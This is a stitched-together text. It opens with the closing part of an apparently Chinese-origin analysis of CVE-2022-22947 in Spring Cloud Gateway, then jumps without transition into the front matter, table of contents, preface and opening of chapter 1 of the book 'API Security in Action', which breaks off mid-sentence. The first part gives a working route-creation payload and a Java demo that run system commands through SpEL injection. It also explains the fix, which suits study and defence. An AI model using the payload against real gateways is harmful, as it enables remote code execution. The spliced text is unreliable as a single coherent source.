In fact, even without analyzing the source code, the existing payloads and the official fix diff are enough to reach a conclusion: during dynamic route creation, some filter parses the values passed into it as SpEL expressions, which results in a remote code execution vulnerability.
Is that really the case?
Following this line of thought, we can verify it by locating the source and the sink and then drawing lines upward and downward between them.
First, look at the source, that is, the payload used when creating the route:

{
    "id": "hacktest",
    "filters": [{
        "name": "AddResponseHeader",
        "args": {
            "name": "Result",
            "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
        }
    }],
    "uri": "http://example.com"
}

As you can see, the filter used here is AddResponseHeader. Since we already suspect a SpEL expression, we can search directly for StandardEvaluationContext, the trigger point of SpEL, and we find that the getValue method of the ShortcutConfigurable interface uses a StandardEvaluationContext and parses the SpEL expression passed into it.
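To see why evaluating attacker input against a StandardEvaluationContext is so dangerous, here is a small standalone sketch. This is not Gateway code, just the same kind of expression evaluated the same way:

import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.StandardEvaluationContext;

public class SpelDemo {
    public static void main(String[] args) {
        SpelExpressionParser parser = new SpelExpressionParser();
        // StandardEvaluationContext exposes the full SpEL feature set,
        // including T() type references and constructor invocation
        StandardEvaluationContext context = new StandardEvaluationContext();
        Expression exp = parser.parseExpression(
                "new String(T(org.springframework.util.StreamUtils).copyToByteArray("
                + "T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"})"
                + ".getInputStream()))");
        // Evaluating attacker-controlled input here is effectively arbitrary code execution
        System.out.println(exp.getValue(context, String.class));
    }
}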
Next, let us look at which classes implement the ShortcutConfigurable interface. There are quite a few, but the one we are after is the class related to the AddResponseHeader filter. The factory class of the AddResponseHeader filter is org.springframework.cloud.gateway.filter.factory.AddResponseHeaderGatewayFilterFactory, so the module name leads us straight to its location.
Examining them one by one reveals that:
AddResponseHeaderGatewayFilterFactory extends AbstractNameValueGatewayFilterFactory;
AbstractNameValueGatewayFilterFactory extends AbstractGatewayFilterFactory;
AbstractGatewayFilterFactory implements the GatewayFilterFactory interface;
the GatewayFilterFactory interface extends ShortcutConfigurable.
Therefore, when the value passed in through AddResponseHeaderGatewayFilterFactory is evaluated (getValue()), the corresponding methods are invoked upward one by one until execution reaches the place where the SpEL expression parser performs the final parsing, and that is what triggers the SpEL expression injection vulnerability.
Finally, we can also go straight into the AddResponseHeaderGatewayFilterFactory class and review it:

public class AddResponseHeaderGatewayFilterFactory extends AbstractNameValueGatewayFilterFactory {

	@Override
	public GatewayFilter apply(NameValueConfig config) {
		return new GatewayFilter() {
			@Override
			public Mono<Void> filter(ServerWebExchange exchange, GatewayFilterChain chain) {
				String value = ServerWebExchangeUtils.expand(exchange, config.getValue());
				exchange.getResponse().getHeaders().add(config.getName(), value);
				return chain.filter(exchange);
			}

			@Override
			public String toString() {
				return filterToStringCreator(AddResponseHeaderGatewayFilterFactory.this)
						.append(config.getName(), config.getValue()).toString();
			}
		};
	}
}

As you can see, the apply method receives a config of type NameValueConfig; following that type shows that NameValueConfig holds two values, neither of which may be empty.
NameValueConfig lives in AbstractNameValueGatewayFilterFactory, which is the parent class of AddResponseHeaderGatewayFilterFactory. It is in this parent class that the getValue() operation takes place, and the value returned from config via getValue() is exactly the result of evaluating our SpEL expression.
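For reference, the NameValueConfig type looks roughly like the following. This is a paraphrase of the Spring Cloud Gateway source from memory, shown only to illustrate the two required fields:

// Inner class of AbstractNameValueGatewayFilterFactory (shape paraphrased):
public static class NameValueConfig {

    @NotEmpty
    protected String name;

    @NotEmpty
    protected String value;

    public String getName() { return name; }

    public NameValueConfig setName(String name) {
        this.name = name;
        return this;
    }

    public String getValue() { return value; }

    public NameValueConfig setValue(String value) {
        this.value = value;
        return this;
    }
}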
0x04 Fixing the Vulnerability
Since this is a SpEL expression injection vulnerability, and the cause of such vulnerabilities is generally the use of the StandardEvaluationContext method to parse expressions, note that there are two contexts for parsing expressions:
SimpleEvaluationContext: exposes a subset of the SpEL language features and configuration options, aimed at categories of expressions that do not need the full extent of the SpEL language syntax and should be deliberately restricted.
StandardEvaluationContext: exposes the full set of SpEL language features and configuration options. You can use it to specify a default root object and to configure every available evaluation-related strategy.
SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax, excluding Java type references, constructors, and bean references, whereas StandardEvaluationContext supports the full SpEL syntax. So, going by these functional descriptions, it is enough to replace the StandardEvaluationContext method with the SimpleEvaluationContext method.
The official fix instead uses a BeanFactoryResolver to reference beans and passes it into GatewayEvaluationContext, a parsing class the project wrote itself.
In addition, the project team gave some advice: if you do not need the Gateway actuator endpoint functionality, turn it off; if you do need it, protect it with Spring Security. For specific protection methods, see: https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html#actuator.endpoints.security
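For comparison, here is a minimal sketch of the restricted approach described above; the User class is invented for illustration:

import org.springframework.expression.Expression;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;

public class SafeSpelDemo {
    public static void main(String[] args) {
        SpelExpressionParser parser = new SpelExpressionParser();
        // Read-only data binding: no type references, constructors, or bean references
        SimpleEvaluationContext context =
                SimpleEvaluationContext.forReadOnlyDataBinding().build();

        // Harmless property-style expressions still work against a root object...
        Expression ok = parser.parseExpression("name");
        System.out.println(ok.getValue(context, new User("panda"), String.class));

        // ...but the exploit-style expression is now rejected at evaluation time
        try {
            Expression evil = parser.parseExpression(
                    "T(java.lang.Runtime).getRuntime().exec('id')");
            evil.getValue(context, new User("panda"));
        } catch (Exception e) {
            System.out.println("Rejected as expected: " + e.getMessage());
        }
    }

    public static class User {
        private final String name;
        public User(String name) { this.name = name; }
        public String getName() { return name; }
    }
}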
0x05 Final Words
The principle behind this vulnerability is fairly clear. My regret is that I did not dig deeper into the SSRF vulnerability Master Chen posted in his planet and try to discover new vulnerabilities from it. Sure enough, success is reserved for the attentive!
A reminder here: in a real environment, if deletion does not work for some reason, the refresh request may fail, which could cause problems for the site. So when testing against real targets, do not mess around recklessly, or you may end up having to restart the site.
Finally, doesn't this vulnerability look like an officially provided kind of in-memory webshell? (hhhhhhhh
My writing skills are limited; if there are mistakes in this article, corrections from fellow researchers are welcome.

0x06 References
https://juejin.cn/post/6844903639840980999
https://blog.csdn.net/qq_38233650/article/details/98038225
https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/README.zh-cn.md
https://github.com/spring-cloud/spring-cloud-gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e
Security mechanisms
Mechanism                               Chapter
Audit logging                           3
Rate-limiting                           3
Passwords                               3
Cookies                                 4
Token-based auth                        5
Macaroons                               9
JSON web tokens (JWTs)                  6
Access control lists (ACL)              3
Roles                                   8
Attribute-based access control (ABAC)   8
Capabilities                            9
OAuth2                                  7
Encryption                              6
End-to-end authentication               13
Certificates                            11
API Security
in Action
NEIL MADDEN
M A N N I N G
SHELTER ISLAND
For online information and ordering of this and other Manning books, please visit
www.manning.com. The publisher offers discounts on this book when ordered in quantity.
For more information, please contact
Special Sales Department
Manning Publications Co.
20 Baldwin Road
PO Box 761
Shelter Island, NY 11964
Email: [email protected]
©2020 by Manning Publications Co. All rights reserved.
No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in
any form or by means electronic, mechanical, photocopying, or otherwise, without prior written
permission of the publisher.
Many of the designations used by manufacturers and sellers to distinguish their products are
claimed as trademarks. Where those designations appear in the book, and Manning Publications
was aware of a trademark claim, the designations have been printed in initial caps or all caps.
Recognizing the importance of preserving what has been written, it is Manning’s policy to have
the books we publish printed on acid-free paper, and we exert our best efforts to that end.
Recognizing also our responsibility to conserve the resources of our planet, Manning books
are printed on paper that is at least 15 percent recycled and processed without the use of
elemental chlorine.
Development editor: Toni Arritola
Technical development editor: Joshua White
Review editor: Ivan Martinović
Production editor: Deirdre S. Hiam
Copy editor: Katie Petito
Proofreader: Keri Hales
Technical proofreader: Ubaldo Pescatore
Typesetter: Dennis Dalinnik
Cover designer: Marija Tudor

Manning Publications Co.
20 Baldwin Road
PO Box 761
Shelter Island, NY 11964
ISBN: 9781617296024
Printed in the United States of America
In memory of Susan Elizabeth Madden, 1950–2018.
contents

preface xi
acknowledgments xiii
about this book xv
about the author xix
about the cover illustration xx

PART 1 FOUNDATIONS 1

1 What is API security? 3
1.1 An analogy: Taking your driving test 4
1.2 What is an API? 6
    API styles 7
1.3 API security in context 8
    A typical API deployment 10
1.4 Elements of API security 12
    Assets 13 ■ Security goals 14 ■ Environments and threat models 16
1.5 Security mechanisms 19
    Encryption 20 ■ Identification and authentication 21 ■ Access control and authorization 22 ■ Audit logging 23 ■ Rate-limiting 24

2 Secure API development 27
2.1 The Natter API 27
    Overview of the Natter API 28 ■ Implementation overview 29 ■ Setting up the project 30 ■ Initializing the database 32
2.2 Developing the REST API 34
    Creating a new space 34
2.3 Wiring up the REST endpoints 36
    Trying it out 38
2.4 Injection attacks 39
    Preventing injection attacks 43 ■ Mitigating SQL injection with permissions 45
2.5 Input validation 47
2.6 Producing safe output 53
    Exploiting XSS Attacks 54 ■ Preventing XSS 57 ■ Implementing the protections 58

3 Securing the Natter API 62
3.1 Addressing threats with security controls 63
3.2 Rate-limiting for availability 64
    Rate-limiting with Guava 66
3.3 Authentication to prevent spoofing 70
    HTTP Basic authentication 71 ■ Secure password storage with Scrypt 72 ■ Creating the password database 72 ■ Registering users in the Natter API 74 ■ Authenticating users 75
3.4 Using encryption to keep data private 78
    Enabling HTTPS 80 ■ Strict transport security 82
3.5 Audit logging for accountability 82
3.6 Access control 87
    Enforcing authentication 89 ■ Access control lists 90 ■ Enforcing access control in Natter 92 ■ Adding new members to a Natter space 94 ■ Avoiding privilege escalation attacks 95

PART 2 TOKEN-BASED AUTHENTICATION 99

4 Session cookie authentication 101
4.1 Authentication in web browsers 102
    Calling the Natter API from JavaScript 102 ■ Intercepting form submission 104 ■ Serving the HTML from the same origin 105 ■ Drawbacks of HTTP authentication 108
4.2 Token-based authentication 109
    A token store abstraction 111 ■ Implementing token-based login 112
4.3 Session cookies 115
    Avoiding session fixation attacks 119 ■ Cookie security attributes 121 ■ Validating session cookies 123
4.4 Preventing Cross-Site Request Forgery attacks 125
    SameSite cookies 127 ■ Hash-based double-submit cookies 129 ■ Double-submit cookies for the Natter API 133
4.5 Building the Natter login UI 138
    Calling the login API from JavaScript 140
4.6 Implementing logout 143

5 Modern token-based authentication 146
5.1 Allowing cross-domain requests with CORS 147
    Preflight requests 148 ■ CORS headers 150 ■ Adding CORS headers to the Natter API 151
5.2 Tokens without cookies 154
    Storing token state in a database 155 ■ The Bearer authentication scheme 160 ■ Deleting expired tokens 162 ■ Storing tokens in Web Storage 163 ■ Updating the CORS filter 166 ■ XSS attacks on Web Storage 167
5.3 Hardening database token storage 170
    Hashing database tokens 170 ■ Authenticating tokens with HMAC 172 ■ Protecting sensitive attributes 177

6 Self-contained tokens and JWTs 181
6.1 Storing token state on the client 182
    Protecting JSON tokens with HMAC 183
6.2 JSON Web Tokens 185
    The standard JWT claims 187 ■ The JOSE header 188 ■ Generating standard JWTs 190 ■ Validating a signed JWT 193
6.3 Encrypting sensitive attributes 195
    Authenticated encryption 197 ■ Authenticated encryption with NaCl 198 ■ Encrypted JWTs 200 ■ Using a JWT library 203
6.4 Using types for secure API design 206
6.5 Handling token revocation 209
    Implementing hybrid tokens 210

PART 3 AUTHORIZATION 215

7 OAuth2 and OpenID Connect 217
7.1 Scoped tokens 218
    Adding scoped tokens to Natter 220 ■ The difference between scopes and permissions 223
7.2 Introducing OAuth2 226
    Types of clients 227 ■ Authorization grants 228 ■ Discovering OAuth2 endpoints 229
7.3 The Authorization Code grant 230
    Redirect URIs for different types of clients 235 ■ Hardening code exchange with PKCE 236 ■ Refresh tokens 237
7.4 Validating an access token 239
    Token introspection 239 ■ Securing the HTTPS client configuration 245 ■ Token revocation 248 ■ JWT access tokens 249 ■ Encrypted JWT access tokens 256 ■ Letting the AS decrypt the tokens 258
7.5 Single sign-on 258
7.6 OpenID Connect 260
    ID tokens 260 ■ Hardening OIDC 263 ■ Passing an ID token to an API 264

8 Identity-based access control 267
8.1 Users and groups 268
    LDAP groups 271
8.2 Role-based access control 274
    Mapping roles to permissions 276 ■ Static roles 277 ■ Determining user roles 279 ■ Dynamic roles 280
8.3 Attribute-based access control 282
    Combining decisions 284 ■ Implementing ABAC decisions 285 ■ Policy agents and API gateways 289 ■ Distributed policy enforcement and XACML 290 ■ Best practices for ABAC 291

9 Capability-based security and macaroons 294
9.1 Capability-based security 295
9.2 Capabilities and REST 297
    Capabilities as URIs 299 ■ Using capability URIs in the Natter API 303 ■ HATEOAS 308 ■ Capability URIs for browser-based clients 311 ■ Combining capabilities with identity 314 ■ Hardening capability URIs 315
9.3 Macaroons: Tokens with caveats 319
    Contextual caveats 321 ■ A macaroon token store 322 ■ First-party caveats 325 ■ Third-party caveats 328

PART 4 MICROSERVICE APIS IN KUBERNETES 333

10 Microservice APIs in Kubernetes 335
10.1 Microservice APIs on Kubernetes 336
10.2 Deploying Natter on Kubernetes 339
    Building H2 database as a Docker container 341 ■ Deploying the database to Kubernetes 345 ■ Building the Natter API as a Docker container 349 ■ The link-preview microservice 353 ■ Deploying the new microservice 355 ■ Calling the link-preview microservice 357 ■ Preventing SSRF attacks 361 ■ DNS rebinding attacks 366
10.3 Securing microservice communications 368
    Securing communications with TLS 368 ■ Using a service mesh for TLS 370 ■ Locking down network connections 375
10.4 Securing incoming requests 377

11 Securing service-to-service APIs 383
11.1 API keys and JWT bearer authentication 384
11.2 The OAuth2 client credentials grant 385
    Service accounts 387
11.3 The JWT bearer grant for OAuth2 389
    Client authentication 391 ■ Generating the JWT 393 ■ Service account authentication 395
11.4 Mutual TLS authentication 396
    How TLS certificate authentication works 397 ■ Client certificate authentication 399 ■ Verifying client identity 402 ■ Using a service mesh 406 ■ Mutual TLS with OAuth2 409 ■ Certificate-bound access tokens 410
11.5 Managing service credentials 415
    Kubernetes secrets 415 ■ Key and secret management services 420 ■ Avoiding long-lived secrets on disk 423 ■ Key derivation 425
11.6 Service API calls in response to user requests 428
    The phantom token pattern 429 ■ OAuth2 token exchange 431

PART 5 APIS FOR THE INTERNET OF THINGS 437

12 Securing IoT communications 439
12.1 Transport layer security 440
    Datagram TLS 441 ■ Cipher suites for constrained devices 452
12.2 Pre-shared keys 458
    Implementing a PSK server 460 ■ The PSK client 462 ■ Supporting raw PSK cipher suites 463 ■ PSK with forward secrecy 465
12.3 End-to-end security 467
    COSE 468 ■ Alternatives to COSE 472 ■ Misuse-resistant authenticated encryption 475
12.4 Key distribution and management 479
    One-off key provisioning 480 ■ Key distribution servers 481 ■ Ratcheting for forward secrecy 482 ■ Post-compromise security 484

13 Securing IoT APIs 488
13.1 Authenticating devices 489
    Identifying devices 489 ■ Device certificates 492 ■ Authenticating at the transport layer 492
13.2 End-to-end authentication 496
    OSCORE 499 ■ Avoiding replay in REST APIs 506
13.3 OAuth2 for constrained environments 511
    The device authorization grant 512 ■ ACE-OAuth 517
13.4 Offline access control 518
    Offline user authentication 518 ■ Offline authorization 520

appendix A Setting up Java and Maven 523
appendix B Setting up Kubernetes 532
index 535
preface
I have been a professional software developer, off and on, for about 20 years now, and
I’ve worked with a wide variety of APIs over those years. My youth was spent hacking
together adventure games in BASIC and a little Z80 machine code, with no concern
that anyone else would ever use my code, let alone need to interface with it. It wasn’t
until I joined IBM in 1999 as a pre-university employee (affectionately known as
“pooeys”) that I first encountered code that was written to be used by others. I remem-
ber a summer spent valiantly trying to integrate a C++ networking library into a testing
framework with only a terse email from the author to guide me. In those days I was
more concerned with deciphering inscrutable compiler error messages than thinking
about security.
Over time the notion of API has changed to encompass remotely accessed inter-
faces where security is no longer so easily dismissed. Running scared from C++, I
found myself in a world of Enterprise Java Beans, with their own flavor of remote API
calls and enormous weight of interfaces and boilerplate code. I could never quite
remember what it was I was building in those days, but whatever it was must be tre-
mendously important to need all this code. Later we added a lot of XML in the form
of SOAP and XML-RPC. It didn’t help. I remember the arrival of RESTful APIs and
then JSON as a breath of fresh air: at last the API was simple enough that you could
stop and think about what you were exposing to the world. It was around this time
that I became seriously interested in security.
In 2013, I joined ForgeRock, then a startup recently risen from the ashes of Sun
Microsystems. They were busy writing modern REST APIs for their identity and access
management products, and I dived right in. Along the way, I got a crash course in
modern token-based authentication and authorization techniques that have trans-
formed API security in recent years and form a large part of this book. When I was
approached by Manning about writing a book, I knew immediately that API security
would be the subject.
The outline of the book has changed many times during the course of writing it,
but I’ve stayed firm to the principle that details matter in security. You can’t achieve
security purely at an architectural level, by adding boxes labelled “authentication” or
“access control.” You must understand exactly what you are protecting and the guar-
antees those boxes can and can’t provide. On the other hand, security is not the place
to reinvent everything from scratch. In this book, I hope that I’ve successfully trodden
a middle ground: explaining why things are the way they are while also providing lots
of pointers to modern, off-the-shelf solutions to common security problems.
A second guiding principle has been to emphasize that security techniques are
rarely one-size-fits-all. What works for a web application may be completely inappro-
priate for use in a microservices architecture. Drawing on my direct experience, I’ve
included chapters on securing APIs for web and mobile clients, for microservices in
Kubernetes environments, and APIs for the Internet of Things. Each environment
brings its own challenges and solutions.
acknowledgments
I knew writing a book would be a lot of hard work, but I didn’t know that starting it
would coincide with some of the hardest moments of my life personally, and that I
would be ending it in the midst of a global pandemic. I couldn’t have got through it
all without the unending support and love of my wife, Johanna. I’d also like to thank
our daughter, Eliza (the littlest art director), and all our friends and family.
Next, I’d like to thank everyone at Manning who’ve helped turn this book into a
reality. I’d particularly like to thank my development editor, Toni Arritola, who has
patiently guided my teaching style, corrected my errors, and reminded me who I am
writing for. I’d also like to thank my technical editor, Josh White, for keeping me hon-
est with a lot of great feedback. A big thank you to everybody else at Manning who has
helped me along the way. Deirdre Hiam, my project editor; Katie Petito, my copyedi-
tor; Keri Hales, my proofreader; and Ivan Martinović, my review editor. It’s been a
pleasure working with you all.
I’d like to thank my colleagues at ForgeRock for their support and encouragement.
I’d particularly like to thank Jamie Nelson and Jonathan Scudder for encouraging me to
work on the book, and to everyone who reviewed early drafts, in particular Simon
Moffatt, Andy Forrest, Craig McDonnell, David Luna, Jaco Jooste, and Robert Wapshott.
Finally, I’d like to thank Jean-Philippe Aumasson, Flavien Binet, and Anthony
Vennard at Teserakt for their expert review of chapters 12 and 13, and the anonymous
reviewers of the book who provided many detailed comments.
To all the reviewers, Aditya Kaushik, Alexander Danilov, Andres Sacco, Arnaldo
Gabriel, Ayala Meyer, Bobby Lin, Daniel Varga, David Pardo, Gilberto Taccari, Harinath
Kuntamukkala, John Guthrie, Jorge Ezequiel Bo, Marc Roulleau, Michael Stringham,
Ruben Vandeginste, Ryan Pulling, Sanjeev Kumar Jaiswal (Jassi), Satej Sahu, Steve
Atchue, Stuart Perks, Teddy Hagos, Ubaldo Pescatore, Vishal Singh, Willhelm Lehman,
and Zoheb Ainapore: your suggestions helped make this a better book.
about this book
Who should read this book
API Security in Action is written to guide you through the techniques needed to secure
APIs in a variety of environments. It begins by covering basic secure coding tech-
niques and then looks at authentication and authorization techniques in depth.
Along the way, you’ll see how techniques such as rate-limiting and encryption can be
used to harden your APIs against attacks.
This book is written for developers who have some experience in building web
APIs and want to improve their knowledge of API security techniques and best prac-
tices. You should have some familiarity with building RESTful or other remote APIs
and be confident in using a programming language and tools such as an editor or
IDE. No prior experience with secure coding or cryptography is assumed. The book
will also be useful to technical architects who want to come up to speed with the latest
API security approaches.
How this book is organized: A roadmap
This book has five parts that cover 13 chapters.
Part 1 explains the fundamentals of API security and sets the secure foundation for
the rest of the book.
■
Chapter 1 introduces the topic of API security and how to define what makes an
API secure. You’ll learn the basic mechanisms involved in securing an API and
how to think about threats and vulnerabilities.
■
Chapter 2 describes the basic principles involved in secure development and
how they apply to API security. You’ll learn how to avoid many common soft-
ware security flaws using standard coding practices. This chapter also intro-
duces the example application, called Natter, whose API forms the basis of code
samples throughout the book.
■
Chapter 3 is a whirlwind tour of all the basic security mechanisms developed in
the rest of the book. You’ll see how to add basic authentication, rate-limiting,
audit logging, and access control mechanisms to the Natter API.
Part 2 looks at authentication mechanism for RESTful APIs in more detail. Authenti-
cation is the bedrock upon which all other security controls build, so we spend some
time ensuring this foundation is firmly established.
■
Chapter 4 covers traditional session cookie authentication and updates it for
modern web API usage, showing how to adapt techniques from traditional web
applications. You’ll also cover new developments such as SameSite cookies.
■
Chapter 5 looks at alternative approaches to token-based authentication, cover-
ing bearer tokens and the standard Authorization header. It also covers using
local storage to store tokens in a web browser and hardening database token
storage in the backend.
■
Chapter 6 discusses self-contained token formats such as JSON Web Tokens and
alternatives.
Part 3 looks at approaches to authorization and deciding who can do what.
■
Chapter 7 describes OAuth2, which is both a standard approach to token-based
authentication and an approach to delegated authorization.
■
Chapter 8 looks in depth at identity-based access control techniques in which the
identity of the user is used to determine what they are allowed to do. It covers
access control lists, role-based access control, and attribute-based access control.
■
Chapter 9 then looks at capability-based access control, which is an alternative
to identity-based approaches based on fine-grained keys. It also covers maca-
roons, which are an interesting new token format that enables exciting new
approaches to access control.
Part 4 is a deep dive into securing microservice APIs running in a Kubernetes
environment.
■
Chapter 10 is a detailed introduction to deploying APIs in Kubernetes and best
practices for security from a developer’s point of view.
■
Chapter 11 discusses approaches to authentication in service-to-service API calls
and how to securely store service account credentials and other secrets.
Part 5 looks at APIs in the Internet of Things (IoT). These APIs can be particularly
challenging to secure due to the limited capabilities of the devices and the variety of
threats they may encounter.
■
Chapter 12 describes how to secure communications between clients and ser-
vices in an IoT environment. You’ll learn how to ensure end-to-end security
when API requests must travel over multiple transport protocols.
■
Chapter 13 details approaches to authorizing API requests in IoT environ-
ments. It also discusses offline authentication and access control when devices
are disconnected from online services.
About the code
This book contains many examples of source code both in numbered listings and in
line with normal text. In both cases, source code is formatted in a fixed-width font
like this to separate it from ordinary text. Sometimes code is also in bold to high-
light code that has changed from previous steps in the chapter, such as when a new
feature adds to an existing line of code.
In many cases, the original source code has been reformatted; we’ve added line
breaks and reworked indentation to accommodate the available page space in the
book. In rare cases, even this was not enough, and listings include line-continuation
markers (➥). Additionally, comments in the source code have often been removed
from the listings when the code is described in the text. Code annotations accompany
many of the listings, highlighting important concepts.
Source code is provided for all chapters apart from chapter 1 and can be down-
loaded from the GitHub repository accompanying the book at https://github.com/
NeilMadden/apisecurityinaction or from Manning. The code is written in Java but has
been written to be as neutral as possible in coding style and idioms. The examples
should translate readily to other programming languages and frameworks. Full details
of the required software and how to set up Java are provided in appendix A.
liveBook discussion forum
Purchase of API Security in Action includes free access to a private web forum run by
Manning Publications where you can make comments about the book, ask technical
questions, and receive help from the author and from other users. To access the
forum, go to https://livebook.manning.com/#!/book/api-security-in-action/discussion.
You can also learn more about Manning’s forums and the rules of conduct at https://
livebook.manning.com/#!/discussion.
Manning’s commitment to our readers is to provide a venue where a meaningful
dialogue between individual readers and between readers and the author can take
place. It is not a commitment to any specific amount of participation on the part of
the author, whose contribution to the forum remains voluntary (and unpaid). We sug-
gest you try asking the author some challenging questions lest his interest stray! The
forum and the archives of previous discussions will be accessible from the publisher’s
website as long as the book is in print.
Other online resources
Need additional help?
■
The Open Web Application Security Project (OWASP) provides numerous
resources for building secure web applications and APIs. I particularly like the
cheat sheets on security topics at https://cheatsheetseries.owasp.org.
■
https://oauth.net provides a central directory of all things OAuth2. It’s a great
place to find out about all the latest developments.
about the author
NEIL MADDEN is Security Director at ForgeRock and has an in-depth knowledge of
applied cryptography, application security, and current API security technologies. He
has worked as a programmer for 20 years and holds a PhD in Computer Science.
about the cover illustration
The figure on the cover of API Security in Action is captioned “Arabe du désert,” or
Arab man in the desert. The illustration is taken from a collection of dress costumes
from various countries by Jacques Grasset de Saint-Sauveur (1757–1810), titled Cos-
tumes de Différents Pays, published in France in 1788. Each illustration is finely drawn
and colored by hand. The rich variety of Grasset de Saint-Sauveur’s collection
reminds us vividly of how culturally apart the world’s towns and regions were just
200 years ago. Isolated from each other, people spoke different dialects and lan-
guages. In the streets or in the countryside, it was easy to identify where they lived and
what their trade or station in life was just by their dress. The way we dress has changed
since then and the diversity by region, so rich at the time, has faded away. It is now hard
to tell apart the inhabitants of different continents, let alone different towns, regions,
or countries. Perhaps we have traded cultural diversity for a more varied personal
life—certainly for a more varied and fast-paced technological life. At a time when it is
hard to tell one computer book from another, Manning celebrates the inventiveness
and initiative of the computer business with book covers based on the rich diversity of
regional life of two centuries ago, brought back to life by Grasset de Saint-Sauveur’s
pictures.
Part 1
Foundations
This part of the book creates the firm foundation on which the rest of the
book will build.
Chapter 1 introduces the topic of API security and situates it in relation to
other security topics. It covers how to define what security means for an API and
how to identify threats. It also introduces the main security mechanisms used in
protecting an API.
Chapter 2 is a run-through of secure coding techniques that are essential to
building secure APIs. You’ll see some fundamental attacks due to common cod-
ing mistakes, such as SQL injection or cross-site scripting vulnerabilities, and
how to avoid them with simple and effective countermeasures.
Chapter 3 takes you through the basic security mechanisms involved in API
security: rate-limiting, encryption, authentication, audit logging, and authoriza-
tion. Simple but secure versions of each control are developed in turn to help
you understand how they work together to protect your APIs.
After reading these three chapters, you’ll know the basics involved in secur-
ing an API.
What is API security?
This chapter covers
What is an API?
What makes an API secure or insecure?
Defining security in terms of goals
Identifying threats and vulnerabilities
Using mechanisms to achieve security goals

Application Programming Interfaces (APIs) are everywhere. Open your smartphone or tablet and look at the apps you have installed. Almost without exception, those apps are talking to one or more remote APIs to download fresh content and messages, poll for notifications, upload your new content, and perform actions on your behalf.
Load your favorite web page with the developer tools open in your browser, and you'll likely see dozens of API calls happening in the background to render a page that is heavily customized to you as an individual (whether you like it or not). On the server, those API calls may themselves be implemented by many microservices communicating with each other via internal APIs.
Increasingly, even the everyday items in your home are talking to APIs in the cloud—from smart speakers like Amazon Echo or Google Home, to refrigerators, electricity meters, and lightbulbs. The Internet of Things (IoT) is rapidly becoming a reality in both consumer and industrial settings, powered by ever-growing numbers of APIs in the cloud and on the devices themselves.
While the spread of APIs is driving ever more sophisticated applications that
enhance and amplify our own abilities, they also bring increased risks. As we become
more dependent on APIs for critical tasks in work and play, we become more vulnera-
ble if they are attacked. The more APIs are used, the greater their potential to be
attacked. The very property that makes APIs attractive for developers—ease of use—
also makes them an easy target for malicious actors. At the same time, new privacy and
data protection legislation, such as the GDPR in the EU, place legal requirements on
companies to protect users’ data, with stiff penalties if data protections are found to
be inadequate.
This book is about how to secure your APIs against these threats so that you can confi-
dently expose them to the world.
1.1 An analogy: Taking your driving test
To illustrate some of the concepts of API security, consider an analogy from real life:
taking your driving test. This may not seem at first to have much to do with either APIs
or security, but as you will see, there are similarities between aspects of this story and
key concepts that you will learn in this chapter.
You finish work at 5 p.m. as usual. But today is special. Rather than going home to
tend to your carnivorous plant collection and then flopping down in front of the TV,
you have somewhere else to be. Today you are taking your driving test.
You rush out of your office and across the park to catch a bus to the test center. As
you stumble past the queue of people at the hot dog stand, you see your old friend
Alice walking her pet alpaca, Horatio.
“Hi Alice!” you bellow jovially. “How’s the miniature recreation of 18th-century
Paris coming along?”
“Good!” she replies. “You should come and see it soon.”
GDPR
The General Data Protection Regulation (GDPR) is a significant piece of EU law that
came into force in 2018. The aim of the law is to ensure that EU citizens’ personal
data is not abused and is adequately protected by both technical and organizational
controls. This includes security controls that will be covered in this book, as well as
privacy techniques such as pseudonymization of names and other personal informa-
tion (which we will not cover) and requiring explicit consent before collecting or shar-
ing personal data. The law requires companies to report any data breaches within 72
hours and violations of the law can result in fines of up to €20 million (approximately
$23.6 million) or 4% of the worldwide annual turnover of the company. Other jurisdic-
tions are following the lead of the EU and introducing similar privacy and data protec-
tion legislation.
She makes the universally recognized hand-gesture for “call me” and you both
hurry on your separate ways.
You arrive at the test center a little hot and bothered from the crowded bus jour-
ney. If only you could drive, you think to yourself! After a short wait, the examiner
comes out and introduces himself. He asks to see your learner’s driving license and
studies the old photo of you with that bad haircut you thought was pretty cool at the
time. After a few seconds of quizzical stares, he eventually accepts that it is really you,
and you can begin the test.
LEARN ABOUT IT
Most APIs need to identify the clients that are interacting
with them. As these fictional interactions illustrate, there may be different
ways of identifying your API clients that are appropriate in different situa-
tions. As with Alice, sometimes there is a long-standing trust relationship
based on a history of previous interactions, while in other cases a more formal
proof of identity is required, like showing a driving license. The examiner
trusts the license because it is issued by a trusted body, and you match the
photo on the license. Your API may allow some operations to be performed
with only minimal identification of the user but require a higher level of iden-
tity assurance for other operations.
You failed the test this time, so you decide to take a train home. At the station you buy
a standard class ticket back to your suburban neighborhood, but feeling a little devil-
may-care, you decide to sneak into the first-class carriage. Unfortunately, an attendant
blocks your way and demands to see your ticket. Meekly you scurry back into standard
class and slump into your seat with your headphones on.
When you arrive home, you see the light flashing on your answering machine.
Huh, you’d forgotten you even had an answering machine. It’s Alice, inviting you to
the hot new club that just opened in town. You could do with a night out to cheer you
up, so you decide to go.
The doorwoman takes one look at you.
“Not tonight,” she says with an air of sniffy finality.
At that moment, a famous celebrity walks up and is ushered straight inside.
Dejected and rejected, you head home.
What you need is a vacation. You book yourself a two-week stay in a fancy hotel.
While you are away, you give your neighbor Bob the key to your tropical greenhouse
so that he can feed your carnivorous plant collection. Unknown to you, Bob throws a
huge party in your back garden and invites half the town. Thankfully, due to a miscal-
culation, they run out of drinks before any real damage is done (except to Bob’s repu-
tation) and the party disperses. Your prized whisky selection remains safely locked
away inside.
LEARN ABOUT IT
Beyond just identifying your users, an API also needs to be
able to decide what level of access they should have. This can be based on who
they are, like the celebrity getting into the club, or based on a limited-time
token like a train ticket, or a long-term key like the key to the greenhouse that
you lent your neighbor. Each approach has different trade-offs. A key can be
lost or stolen and then used by anybody. On the other hand, you can have dif-
ferent keys for different locks (or different operations) allowing only a small
amount of authority to be given to somebody else. Bob could get into the
